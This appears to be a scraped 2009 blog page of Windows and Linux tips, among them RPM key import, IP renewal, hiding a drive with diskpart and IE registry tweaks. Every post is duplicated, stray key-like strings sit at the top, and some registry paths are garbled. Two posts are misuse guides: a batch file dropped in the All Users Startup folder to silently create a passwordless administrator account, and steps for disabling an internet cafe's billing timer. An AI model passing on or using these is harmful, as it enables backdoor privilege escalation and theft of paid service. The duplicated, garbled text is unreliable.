(Server including virtualization):) R- M) }
2515dd4e215225dd
Virtualization Platform:
49af89414d147589
Desktop
660266e267419c67
Desktop + Workstation Option:
da3122afdb7edd23
Desktop + Workstation + DualOS Option4
s7fcc43557e9bbc42
Desktop + DualOS Option (Virtualization):
fed67649ff918c77
Tuesday, May 19, 2009
Red Hat Linux Cd iso's / repository suppy public key [ RPM-GPG-KEY ]
Usually, you need to run following under RHEL 4:
Code:
rpm --import /usr/share/rhn/RPM-GPG-KEYUnder RHEL 5 path is different /etc/pki/rpm-gpg/
Code:
cd /etc/pki/rpm-gpg/
ls -lThere are multiple keys, import required keys as per your setup. using rpm --import command. Running following should fix the problem:
Code:
rpm --import /etc/pki/rpm-gpg/RPM-GPG-KEY-redhat-releaseAlso, RPM-GPG-KEY should be on CD itself. Assuming ISO image is mounted in /mnt/disk1/, use the following command to import it into the keyring:
Code:
cd /mnt/disk1/
ls RPM-GPG-KEK*
rpm --import /mnt/disk1/RPM-GPG-KEY
Code:
rpm --import /usr/share/rhn/RPM-GPG-KEYUnder RHEL 5 path is different /etc/pki/rpm-gpg/
Code:
cd /etc/pki/rpm-gpg/
ls -lThere are multiple keys, import required keys as per your setup. using rpm --import command. Running following should fix the problem:
Code:
rpm --import /etc/pki/rpm-gpg/RPM-GPG-KEY-redhat-releaseAlso, RPM-GPG-KEY should be on CD itself. Assuming ISO image is mounted in /mnt/disk1/, use the following command to import it into the keyring:
Code:
cd /mnt/disk1/
ls RPM-GPG-KEK*
rpm --import /mnt/disk1/RPM-GPG-KEY
Sunday, May 17, 2009
How to change the static Ip
To start off, you need a direct connection to your modem and computer. If you have a router, disconnect it and directly hook up your modem to your computer.
1. Open up the command prompt by pressing Start->Run and typing in cmd
2. In the command prompt, type “Ipconfig/all”. This will tell you your current IP Address. After, type “ipconfig/release”. Keep the command prompt open for easy access.
3. Go to “Network Connections” (accessible through the control panel). Right click “Local Area Connection” and click “Properties”
4. With “Internet Protocol (TCP/IP) selected, click the “Properties” button.
5. A new window will open. Under the “General” tab, select “Use the Following IP address”. Under “Ip Address”, put “10.0.0.1″. Press the “Tab” key on your keyboard.
6. Press Ok on both open windows.
7. Repeat steps 3-4. Under the “General” tab, press the radio button “Automatically Assign Me an Ip Address”. Press ok on both windows.
8. Go back to the command prompt and type in “Ipconfig/all”. You’ll now notice you have a new IP address.
1. Open up the command prompt by pressing Start->Run and typing in cmd
2. In the command prompt, type “Ipconfig/all”. This will tell you your current IP Address. After, type “ipconfig/release”. Keep the command prompt open for easy access.
3. Go to “Network Connections” (accessible through the control panel). Right click “Local Area Connection” and click “Properties”
4. With “Internet Protocol (TCP/IP) selected, click the “Properties” button.
5. A new window will open. Under the “General” tab, select “Use the Following IP address”. Under “Ip Address”, put “10.0.0.1″. Press the “Tab” key on your keyboard.
6. Press Ok on both open windows.
7. Repeat steps 3-4. Under the “General” tab, press the radio button “Automatically Assign Me an Ip Address”. Press ok on both windows.
8. Go back to the command prompt and type in “Ipconfig/all”. You’ll now notice you have a new IP address.
Hide whole partition of HDD !!!
1. Go to Start > run > type "diskpart".
A DOS window will appear with following discription.
DISKPART>
2. Then type "list volume"
The result will look like : ------
Volume ### Ltr Label Fs Type Size Status Info
--------------- --- -------- ---- ------ ---- ------ ----
Volume 0 F CD-ROM
Volume 1 C Window_XP NTFS Partition 7000MB Healthy System
Volume 2 D Softwares NTFS Partition 8000MB Healthy
Volume 3 E Songs NTFS Partition 8000MB Healthy
3. Suppose u wanna hide drive E then type "select volume 3"
Then a message will appear in same winwods { Volume 3 is the selected volume}
4. Now type "remove letter E"
Now a message will come { Diskpart Removed the Drive letter }
sometime it requires the reboot the computer .
Diskpart will remove the letter .Windows XP is not having capabilty to identify the unkown volume.
Your Data is safe now from all unauthorised users.
To access the content of hidden Drive repeat the process mentioned above. But in 4th step replace " remove" to "assign"i mean type "assign letter E"
A DOS window will appear with following discription.
DISKPART>
2. Then type "list volume"
The result will look like : ------
Volume ### Ltr Label Fs Type Size Status Info
--------------- --- -------- ---- ------ ---- ------ ----
Volume 0 F CD-ROM
Volume 1 C Window_XP NTFS Partition 7000MB Healthy System
Volume 2 D Softwares NTFS Partition 8000MB Healthy
Volume 3 E Songs NTFS Partition 8000MB Healthy
3. Suppose u wanna hide drive E then type "select volume 3"
Then a message will appear in same winwods { Volume 3 is the selected volume}
4. Now type "remove letter E"
Now a message will come { Diskpart Removed the Drive letter }
sometime it requires the reboot the computer .
Diskpart will remove the letter .Windows XP is not having capabilty to identify the unkown volume.
Your Data is safe now from all unauthorised users.
To access the content of hidden Drive repeat the process mentioned above. But in 4th step replace " remove" to "assign"i mean type "assign letter E"
Create a admin account for guest in xp
@echo off
net user Admin /add /expires:never /passwordreq:no
net localgroup "Administrators" /add Admin
now copy this to notepad and save as admin.bat
copy the file to the statup folder.
here is the path of startup folder.
C:\Documents and Settings\All Users\Start Menu\Programs\Startup
when the admin logs on the batch file runs and the admin acc is created...
so nxt time u log on u can use the username:admin
password:no
net user Admin /add /expires:never /passwordreq:no
net localgroup "Administrators" /add Admin
now copy this to notepad and save as admin.bat
copy the file to the statup folder.
here is the path of startup folder.
C:\Documents and Settings\All Users\Start Menu\Programs\Startup
when the admin logs on the batch file runs and the admin acc is created...
so nxt time u log on u can use the username:admin
password:no
Make ur IE works fast like Firefox
1. click start > run
2. type regedit > enter
3. browse folder HKEY_CURRENT_USER\Software\m*cro$oft\Windows\Curre ntVersion\InternetSettings
4. right click @ windows right > New > DWORD
5. type MaxConnectionsPerServer > u can set value (the more higher the no, the more good speed u get, eg : 99)
6. create another DWORD >type MaxConnectionsPer1_0Server
7. then put a high value as mentioned above
8. then, restart IE ... ur finished.
2. type regedit > enter
3. browse folder HKEY_CURRENT_USER\Software\m*cro$oft\Windows\Curre ntVersion\InternetSettings
4. right click @ windows right > New > DWORD
5. type MaxConnectionsPerServer > u can set value (the more higher the no, the more good speed u get, eg : 99)
6. create another DWORD >type MaxConnectionsPer1_0Server
7. then put a high value as mentioned above
8. then, restart IE ... ur finished.
HIDDEN PROGRAMS OF WINDOWS:
1- Private Character Editor
This program is for designing icons and Characters(Alphapet)
Click :start
Then :run
type :EUDCEDIT
.................................................. ..............................
.................................................. ...............
2- iExpress
This Program is for converting your files to EXCUTABLE files
Click : start
Then : run
type : iexpress
.................................................. ..............................
.................................................. ...............
3-Disk Cleanup
This program used for cleaning harddisk to offer space
Click : start
Then : run
type : cleanmgr
.................................................. ..............................
.................................................. ...............
4-Dr Watson
This program Is for repairing problems in Windows
Click : start
Then : run
type : drwtsn32
.................................................. ..............................
.................................................. ...............
5-Windows Media Player 5.1
Opens the old media player
Click : start
Then : run
type : mplay32
.................................................. ..............................
This program is for designing icons and Characters(Alphapet)
Click :start
Then :run
type :EUDCEDIT
.................................................. ..............................
.................................................. ...............
2- iExpress
This Program is for converting your files to EXCUTABLE files
Click : start
Then : run
type : iexpress
.................................................. ..............................
.................................................. ...............
3-Disk Cleanup
This program used for cleaning harddisk to offer space
Click : start
Then : run
type : cleanmgr
.................................................. ..............................
.................................................. ...............
4-Dr Watson
This program Is for repairing problems in Windows
Click : start
Then : run
type : drwtsn32
.................................................. ..............................
.................................................. ...............
5-Windows Media Player 5.1
Opens the old media player
Click : start
Then : run
type : mplay32
.................................................. ..............................
Cyber Cafe - Unlimited Time
Create A New Text Document,
Then Type CMD In It, And Then Save It As a Batch File,
And Then Run The New Batch File On Your Desktop.
Then Command Prompt Should Open,
Now You Type "cd\windows" to change the directory to Windows, than type in "regedit" to get to the registry editor gui, than navigate to "HKEY_CURRENT_USER>Appevents>software>classes> micr osoft>windows>current version>internet settings>policies>system" then on the right pane where it says Disable Taskmanager, right click on it, and scroll down to modify, and then change the value of it to "0", and then open Windows Task Manager By Holding Down These Keys, "CTRL+ALT+DEL/DELETE" And
Then Disable The Internet Cafe's Timer,
Then Type CMD In It, And Then Save It As a Batch File,
And Then Run The New Batch File On Your Desktop.
Then Command Prompt Should Open,
Now You Type "cd\windows" to change the directory to Windows, than type in "regedit" to get to the registry editor gui, than navigate to "HKEY_CURRENT_USER>Appevents>software>classes> micr osoft>windows>current version>internet settings>policies>system" then on the right pane where it says Disable Taskmanager, right click on it, and scroll down to modify, and then change the value of it to "0", and then open Windows Task Manager By Holding Down These Keys, "CTRL+ALT+DEL/DELETE" And
Then Disable The Internet Cafe's Timer,
Subscribe to:
Posts (Atom)